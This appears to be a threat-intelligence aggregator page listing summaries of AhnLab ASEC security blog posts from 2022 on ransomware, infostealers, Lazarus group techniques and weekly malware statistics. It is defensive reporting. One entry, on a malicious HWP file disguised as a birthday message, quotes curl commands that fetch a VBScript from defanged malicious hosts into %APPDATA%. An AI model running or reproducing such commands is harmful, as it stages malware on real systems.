What's new around the internet

Date (GMT) | Title | Description | Tags | Stories | Notes
2022-11-10 05:49:52 | Distribution of Word File (External + RTF) Modified to Avoid Detection | Malicious MS Office Word documents have long been used for the distribution of additional RTF malware by exploiting the fact that Word files allow external connections. However, AhnLab has identified that files which seem to have been made to avoid anti-malware detection are being distributed in Korea. Similar to past cases, an email disguised as a work email with a Word document attachment is used, but a unique factor exists in the webSettings.xml.rels file which can be identified within the... | Malware | |
2022-11-10 05:49:05 | Penetration and Distribution Method of Gwisin Attacker | The attacker behind Gwisin ransomware targets and penetrates the publicly available servers of companies. They then use the server as their foothold for distributing the ransomware into the internal infrastructure. It is known that the attacker uses various means such as SFTP, WMI, integrated management solutions, and the IIS web service to distribute the ransomware into the internal infrastructure. In this confirmed case, they used the IIS web service to distribute Gwisin ransomware. How Gwisin Attacker Penetrates a Server Unlike other... | Ransomware | |
2022-11-08 00:35:33 | (Déjà vu) LockBit 3.0 Being Distributed via Amadey Bot | The ASEC analysis team has confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it is being sold in illegal forums and still being used by various attackers. It was used in the past to install ransomware by attackers of GandCrab or to install FlawedAmmyy by the TA505 group which... | Ransomware, Malware | |
2022-11-03 05:23:46 | (Déjà vu) ASEC Weekly Malware Statistics (October 24th, 2022 – October 30th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 24th, 2022 (Monday) to October 30th (Sunday). For the main category, Infostealer ranked top with 43.2%, followed by downloader with 34.7%, backdoor with 19.4%, and ransomware with 2.2%. Top 1 – Agent Tesla AgentTesla is an Infostealer that ranked first place with 22.1%. It is an Infostealer that leaks user credentials saved in... | Ransomware, Malware | |
2022-11-03 05:23:28 | Surtr Ransomware Being Distributed in Korea | Through internal monitoring, the ASEC analysis team has recently discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[DycripterSupp@mailfence.com].[<random string>].Surtr” file extension to the original file extension name. When Surtr ransomware infects a system, it changes the desktop image of the infected PC and creates a ransom note (See Figures 1 and 2) to inform the user of the ransomware infection. Surtr also creates ransom note files (SURTR_README.hta and SURTR_README.txt) in folders containing the infected... | Ransomware | |
2022-11-02 01:49:15 | Appleseed Being Distributed to Nuclear Power Plant-Related Companies | The ASEC analysis team has recently discovered a case of AppleSeed being distributed to nuclear power plant-related companies. AppleSeed is a backdoor malware used by Kimsuky, one of the organizations affiliated with North Korea, and this malware is being actively distributed to many companies. The filenames of the AppleSeed dropper were identified by the ASEC analysis team as follows, and a double file extension was used to deceive users. When the file is executed, the encoded data inside is decoded... | Malware | |
2022-11-02 01:22:25 | Elbie Ransomware Being Distributed in Korea | The ASEC analysis team has identified through internal monitoring that the Elbie ransomware is being distributed under the disguise of ieinstal.exe, an Internet Explorer Add-on installation program. The initial executable decodes the internal data into an executable that performs the actual ransomware behavior (See Figure 2). Afterward, the decoded executable is injected into the process which has run recursion, and it checks whether the user PC uses a VM environment. The injected and executed ransomware drops a copy into the... | Ransomware | |
2022-10-31 01:58:18 | AgentTesla Being Distributed via VBS | The ASEC analysis team has recently identified that AgentTesla is being distributed through a malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla was found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing. The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified. The compressed file contains the VBS, and... | | |
2022-10-31 01:57:31 | A Case of Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the BYOVD Technique | In the ASEC blog post uploaded in April 2022 (New Malware of Lazarus Threat Actor Group Exploiting INITECH Process, https://asec.ahnlab.com/en/33801/), the team discussed the fact that the Lazarus attack group had been exploiting the INITECH process to infect systems with malware. This article aims to cover the details of the Lazarus group using the watering hole technique to hack into systems before exploiting the vulnerability of the MagicLine4NX product from Dream Security in order to additionally hack into systems in... | Malware, Hack, Vulnerability, Threat, Medical | APT 38 |
2022-10-27 00:16:33 | (Déjà vu) ASEC Weekly Malware Statistics (October 17th, 2022 – October 23rd, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 17th, 2022 (Monday) to October 23rd (Sunday). For the main category, info-stealer ranked top with 52.7%, followed by downloader with 37.0%, backdoor with 8.8%, ransomware with 1.0%, and banking malware with 0.5%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.4%. It is an info-stealer that leaks... | Ransomware, Malware | |
2022-10-27 00:05:57 | Qakbot Malware Being Distributed in Korea | The ASEC analysis team has identified that the Qakbot malware that was introduced in the past is being distributed to Korean users. The overall operation process, including the fact that it uses ISO files, is similar to the previous version, but a process to bypass behavior detection was added. The email distributed to Korean users is as shown below. It has hijacked a normal existing email and replied to it with a malicious file in the attachment, and this distribution process... | Malware | |
2022-10-26 23:59:32 | CoinMiner Being Installed on Vulnerable Apache Tomcat Web Server | The ASEC analysis team has recently identified attacks targeting vulnerable Apache Tomcat web servers. A Tomcat server that has not been updated to the latest version is one of the major attack vectors for exploiting vulnerabilities. In the past, the ASEC blog has also covered attacks targeting Apache Tomcat servers with a vulnerable JBoss version installed. The attackers used JexBoss, a vulnerability exploitation tool, to install a WebShell before gaining control over the target system with the Meterpreter malware. Ordinarily,... | Vulnerability | |
2022-10-26 23:52:48 | FormBook Malware Being Distributed as .NET | The FormBook malware that was recently detected by V3 software had been downloaded to the system and executed while the user was using a web browser. FormBook is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard, and screenshots. It targets random individuals, and is usually distributed through spam mails or uploaded to infiltrated websites. FormBook operates by injecting into a running process memory, and the targets of injection are explorer.exe and arbitrary... | Spam, Malware | |
2022-10-25 01:04:42 | Amadey Bot Disguised as a Famous Korean Messenger Program Being Distributed | On October 17th, 2022, the Korean Internet & Security Agency (KISA) published a security notice titled “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue”, and according to the notice, malware disguised as a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) is being distributed via email. The ASEC analysis team was able to secure a file that seems to be of this type while monitoring relevant samples. This malware has the same filename and icon as the actual messenger program,... | Malware | |
2022-10-25 00:52:47 | (Déjà vu) ASEC Weekly Malware Statistics (October 10th, 2022 – October 16th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 10th, 2022 (Monday) to October 16th, 2022 (Sunday). For the main category, downloader ranked top with 44.4%, followed by info-stealer with 41.7%, backdoor with 12.5%, ransomware with 0.9%, and CoinMiner with 0.5%. Top 1 – SmokeLoader Smokeloader is infostealer / downloader malware that is distributed via exploit kits. This week, it ranked first place... | Ransomware, Malware | |
2022-10-25 00:43:50 | Rapidly Evolving Magniber Ransomware | The Magniber ransomware has recently been evolving rapidly. From changing its file extension and injection to UAC bypassing techniques, the Magniber ransomware has been rapidly changing to bypass the detection of anti-malware software. This article summarizes the evolution of the Magniber ransomware in the last few months based on the analysis that had been previously performed. Table 1 shows the major characteristics of the distributed Magniber ransomware files by date. It had been distributed as five different file extensions (msi,... | Ransomware | |
2022-10-24 23:58:37 | Analysis on Attack Techniques and Cases Using RDP | Overview One of the previous ASEC blog posts discussed cases where attackers abused various remote control tools that are originally used for system management purposes to gain control over infected systems. This post will cover cases where RDP (Remote Desktop Protocol), a default service provided by the baseline Windows OS, was used. RDP is commonly used in most attacks, and this is because it is useful for initial compromise or lateral movement in comparison to remote control tools that require additional... | | |
2022-10-21 03:56:17 | GuLoader Malware Disguised as a Word File Being Distributed in Korea | The ASEC analysis team has discovered that the GuLoader malware is being distributed to Korean corporate users. GuLoader is a downloader that has been steadily distributed since the past, downloading various malware. The phishing mail being distributed is as follows, and has an HTML file attached. When the user opens the attached HTML file, a compressed file is downloaded from the URL below. The compressed file contains an IMG file and the GuLoader malware is inside this IMG file. GuLoader... | Malware | |
2022-10-21 02:30:43 | Attackers Abusing Various Remote Control Tools | Overview Ordinarily, attackers install malware through various methods such as spear phishing emails with a malicious attachment, malvertising, vulnerabilities, and disguising the malware as normal software and uploading it to websites. The malware that is installed includes infostealers which steal information from the infected system, ransomware which encrypts files to demand ransom, and DDoS Bots which are used in DDoS attacks. In addition to these, backdoors and RATs are also major malware programs used by attackers. Backdoor malware is installed... | Ransomware, Malware | |
2022-10-18 23:44:15 | (Déjà vu) ASEC Weekly Malware Statistics (October 3rd, 2022 – October 9th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 3rd, 2022 (Monday) to October 9th, 2022 (Sunday). For the main category, downloader ranked top with 45.0%, followed by info-stealer with 39.6%, backdoor with 14.6%, ransomware with 0.4%, and CoinMiner with 0.4%. Top 1 – SmokeLoader Smokeloader is infostealer / downloader malware that is distributed via exploit kits. This week, it ranked first place... | Ransomware, Malware | |
2022-10-12 04:48:14 | Lazarus Group Uses the DLL Side-Loading Technique (mi.dll) | While tracking the Lazarus attack group, the ASEC analysis team discovered that the attackers were using the DLL Side-Loading attack technique (T1574.002) by abusing legitimate applications in the initial compromise stage to achieve the next stage of their attack process. https://attack.mitre.org/techniques/T1574/002/ The DLL Side-Loading attack technique saves a legitimate application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. In other words, it is a malware... | | APT 38 |
2022-10-12 04:24:38 | GlobeImposter Ransomware Being Distributed in Korea | The ASEC analysis team has recently identified through internal monitoring that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed. This GlobeImposter ransomware has also been mentioned in AhnLab TIP’s quarterly statistics, specifically in the ‘2022 1st and 2nd Quarter Statistical Report on Malware Targeting MS-SQL’, and in the 2nd quarter, GlobeImposter took up 52.6% of ransomware targeting MS-SQL. It has been identified that the GlobeImposter ransomware is still appearing in the soon-to-be-released 3rd quarter statistics. This ransomware... | Ransomware, Malware | |
2022-10-12 04:18:45 | (Déjà vu) ASEC Weekly Malware Statistics (September 26th, 2022 – October 2nd, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday). For the main category, downloader ranked top with 38.2%, followed by info-stealer with 35.1%, ransomware with 14.7%, backdoor with 11.6%, and CoinMiner with 0.4%. Top 1 – BeamWinHTTP BeamWinHTTP is a downloader malware that ranked top with 16.7%. BeamWinHTTP is distributed via malware disguised... | Ransomware, Malware | |
2022-10-12 04:01:25 | Qakbot Being Distributed as ISO Files Instead of Excel Macro | There is a recent increase in the distribution of malware through ISO files. Among this malware, it has been identified that Qakbot, an online banking malware, has had its distribution method changed from Excel 4.0 Macro to ISO files. The ASEC blog introduced cases of ISO file usage for not only Qakbot, but also AsyncRAT, IcedID, and BumbleBee malware. As such, we can see that cases of using ISO files for malware distribution are increasing. The phishing mail that... | Malware | |
2022-10-05 01:33:03 | Change in Magniber Ransomware (*.js → *.wsf) – September 28th | The ASEC analysis team explained in the blog post on September 8th that the Magniber ransomware had changed from having a CPL extension to a JSE extension. The attacker made another change after September 8th, changing the file extension from JSE to JS on September 16th. And on September 28th, the attacker changed the distribution method once again, changing the file extension from JS to WSF. It seems the attacker is continuously distributing variations to bypass various detection methods... | Ransomware | |
2022-09-28 04:06:47 | (Déjà vu) ASEC Weekly Malware Statistics (September 19th, 2022 – September 25th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 19th, 2022 (Monday) to September 25th, 2022 (Sunday). For the main category, info-stealer ranked top with 51.3%, followed by backdoor with 21.1%, downloader with 17.2%, and ransomware with 10.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 20.7%. It is an info-stealer that leaks user credentials saved... | Ransomware, Malware | |
2022-09-28 03:48:50 | LockBit 3.0 Ransomware Distributed via Word Documents | The ASEC analysis team has identified that LockBit 3.0 ransomware, distributed while disguised as job application emails in NSIS format, is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases. There is an external link in the... | Ransomware | |
2022-09-28 03:39:14 | (Déjà vu) ASEC Weekly Malware Statistics (September 12th, 2022 – September 18th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 12th, 2022 (Monday) to September 18th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.5%, followed by downloader with 27.5%, backdoor with 19.9%, ransomware with 8.2%, and banking malware with 2.9%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 18.1%. It is an info-stealer that... | Ransomware, Malware | |
2022-09-27 03:55:32 | NSIS Type of LockBit 3.0 Ransomware Disguised as Job Application Emails Being Distributed | In February and June, the ASEC Analysis team posted in the blog about LockBit 2.0 ransomware being distributed via email. In this blog, we will introduce the new version of the LockBit 3.0 ransomware that is still being distributed through a similar method. While in June there were multiple cases of the ransomware being distributed disguised as a copyright-related email, recently it is being distributed as a phishing email disguised as an email on the subject of job applications. As shown in... | Ransomware | |
2022-09-23 00:14:52 | FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers | The ASEC analysis team is constantly monitoring malware distributed to vulnerable MS-SQL servers. The analysis team has recently discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware strains that target vulnerable MS-SQL servers. In the past, it was also called Mallox because it used the file extension .mallox. – [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers – [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers... | Ransomware, Malware | |
2022-09-22 05:47:21 | Analysis Report on Lazarus Group's Rootkit Attack Using BYOVD | Since 2009, Lazarus Group, known to be a group of hackers in North Korea, has been attacking not only Korea but various countries of America, Asia, and Europe. According to AhnLab’s ASD (AhnLab Smart Defense) infrastructure, in early 2022, the Lazarus Group performed APT (Advanced Persistent Threat) attacks on Korea’s defense, finance, media, and pharmaceutical industries. AhnLab closely tracked these APT attacks and discovered that these attacks incapacitate security products in the attack process. An analysis of the attack process... | Medical | APT 38 | ★★★★
2022-09-21 00:45:18 | Video of Blocking Latest Magniber Ransomware Using V3 (AMSI + Memory Scan) | The ASEC analysis team introduced the Magniber variants in the blog posted on September 15th. From September 16th, the Magniber ransomware script, whilst still JavaScript, has had its file extension changed from *.jse to *.js. As Magniber changed to JavaScript starting September 8th, its operational method has also changed from the previous method. The currently distributed JavaScript file contains a .NET DLL (see Figure 2), and injects the Magniber shellcode into currently running processes. The overall operation flow of... | Ransomware | |
2022-09-21 00:28:20 | (Déjà vu) ASEC Weekly Malware Statistics (September 5th, 2022 – September 11th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 5th, 2022 (Monday) to September 11th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.1%, followed by downloader with 32.7%, backdoor with 12.5%, and ransomware with 7.7%. Top 1 – GuLoader GuLoader, which ranked first place with 21.1%, is a downloader malware that downloads additional malware and runs it. It... | Ransomware, Malware | |
2022-09-15 00:00:00 | Change in Magniber Ransomware (*.cpl → *.jse) – September 8th | After Magniber changed its method of distribution from an MSI format to a CPL format on July 20th, it was observed to show decreased distribution activity as of mid-August. While continuously monitoring for changes, the ASEC analysis team found that the distribution format of Magniber has changed from *.CPL (DLL type) to *.JSE (script) format starting from September 8th, 2022. As Magniber is one of the most damaging ransomware to Korean users and is employing various methods to bypass... | Ransomware | |
2022-09-14 00:40:00 | Phishing Websites Disguised as Korean Groupware Login Website Being Distributed | The ASEC analysis team has been building a honeypot to collect various malware strains that are being distributed both in Korea and overseas. The honeypot also collects phishing emails and recently caught one targeting Korean users, which had been distributed continuously to Korean email accounts only since August. The phishing website the email redirects to is disguised as a login page for a Korean groupware site, and over 2,500 cases were confirmed to access the website. Thus users must... | Malware | |
2022-09-14 00:30:00 | (Déjà vu) ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader GuLoader, which ranked first place with 22.6%, is a downloader malware that... | Ransomware, Malware | |
2022-09-05 03:51:49 | HWP File Disguised as Personal Profile Form (OLE Object) | The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and Flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a Flash vulnerability (CVE-2018-15982) file, which requires users to take caution. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened. The created files are shown below. The HWP file does not directly use previously known files... | Vulnerability | |
2022-09-01 09:49:18 | (Déjà vu) ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials... | Ransomware, Malware | |
2022-09-01 09:47:35 | (Déjà vu) ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 38.5%. It is an info-stealer that leaks... | Ransomware, Malware | |
2022-09-01 01:51:53 | Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) | The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs features such as registering to task... | Malware | |
2022-08-31 23:27:23 | Malicious Word Files Targeting Specific Individuals Related to North Korea | The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows: Date Filename July 18th (Format Style) Collecting Feedback of Experts on 2022 National... | | |
2022-08-31 23:26:41 | RAT Tool Disguised as Solution File (*.sln) Being Distributed on GitHub | The ASEC analysis team has recently discovered the distribution of a RAT tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. It is through methods like this that the malware distributor lures users to run the RAT tool by... | Malware, Tool | |
2022-08-31 23:25:00 | Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies | Recently, there have been frequent incidents where attackers infiltrated and took control of the internal network of Korean companies, starting with vulnerable servers exposed externally. Cases of Attacks Targeting Vulnerable Atlassian Confluence Servers; Meterpreter Distributed to Vulnerable Server of Korean Medical Institution; AsyncRAT Being Distributed to Vulnerable MySQL Servers. This is a case of infiltration into an IIS web server or an MS Exchange server and is the same as previously known types. However, this post will discuss cases that... | | |
2022-08-24 05:02:44 | AsyncRAT Being Distributed in Fileless Form | The ASEC analysis team has recently discovered that malicious AsyncRAT code is being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file being distributed through phishing emails has an HTML file, and executing this file will... | Malware | |
2022-08-24 04:26:37 | BitRAT and XMRig CoinMiner Being Distributed via Windows License Verification Tool | The ASEC analysis team has recently discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool. As introduced in previous posts, BitRAT has a history of being distributed on webhards as MS Windows license verification tools and MS Office installation programs. It is likely that the case covered by this post is being done by the same attacker. One thing to note is that a BitRAT remote control tool is installed in the environment without... | Tool | |
2022-08-18 00:26:46 | (Déjà vu) ASEC Weekly Malware Statistics (August 8th, 2022 – August 14th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 8th, 2022 (Monday) to August 14th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.9%, followed by backdoor with 38.4%, downloader with 16.8%, ransomware with 2.2%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.1%. It is an info-stealer that leaks... | Ransomware, Malware | |
2022-08-17 01:43:10 | (Déjà vu) ASEC Weekly Malware Statistics (August 1st, 2022 – August 7th, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 1st, 2022 (Monday) to August 7th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.4%, followed by backdoor with 22.6%, downloader with 20.0%, ransomware with 6.8%, banking with 2.6%, and CoinMiner with 0.5%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 25.8%. It is... | Ransomware, Malware | |
2022-08-08 02:21:33 | Monero CoinMiner Being Distributed via Webhards | Webhards are the main platforms that attackers targeting Korean users exploit to distribute malware. The ASEC analysis team has been monitoring malware types distributed through webhards and uploaded multiple blog posts about them in the past. Generally, attackers distribute malware with illegal programs such as adult games and cracked versions of games. Those who use webhards as a distribution path typically install RAT-type malware such as njRAT, UdpRAT, and DDoS IRC Bot. The team has recently discovered the... | Malware | |
2022-08-03 02:20:00 | (Déjà vu) ASEC Weekly Malware Statistics (July 25th, 2022 – July 31st, 2022) | The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 25th, 2022 (Monday) to July 31st, 2022 (Sunday). For the main category, info-stealer ranked top with 38.6%, followed by backdoor with 38.1%, and downloader with 23.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.8%. It is an info-stealer that leaks user credentials saved in web... | Malware | |
2022-08-03 02:19:00 | Gwisin Ransomware Targeting Korean Companies | Cases of Gwisin ransomware attacking Korean companies are recently on the rise. It is being distributed to target specific companies. It is similar to Magniber in that it operates in the MSI installer form. Yet unlike Magniber, which targets random individuals, Gwisin does not perform malicious behaviors on its own, requiring a special value for the execution argument. The value is used as key information to run the DLL file included in the MSI. As such, the file alone... | Ransomware | |
Last update at: 2024-05-13 03:07:47